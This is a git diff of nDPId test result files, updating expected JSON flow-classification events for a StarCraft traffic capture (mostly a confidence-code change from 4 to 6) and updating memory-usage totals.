-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":200000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":200000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 
00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":800,"packets-processed":797,"total-skipped-flows":0,"total-l4-payload-len":316668,"total-not-detected-flows":0,"total-guessed-flows":13,"total-detected-flows":39,"total-detection-updates":12,"total-updates":0,"current-active-flows":0,"total-active-flows":52,"total-idle-flows":52,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":315,"global_ts_msec":1437389985996} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 800/797 
@@ -321,9 +321,9 @@ ~~ total active/idle flows...: 52/52 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5973240 bytes -~~ total memory freed........: 5973240 bytes -~~ total allocations/frees...: 119189/119189 +~~ total memory allocated....: 6106874 bytes +~~ total memory freed........: 6106874 bytes +~~ total allocations/frees...: 121951/121951 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 199 chars ~~ json string max len.......: 1155 chars diff --git a/test/results/steam.pcap.out b/test/results/steam.pcap.out index 6c9a0281a..5b001cd18 100644 --- a/test/results/steam.pcap.out +++ b/test/results/steam.pcap.out 
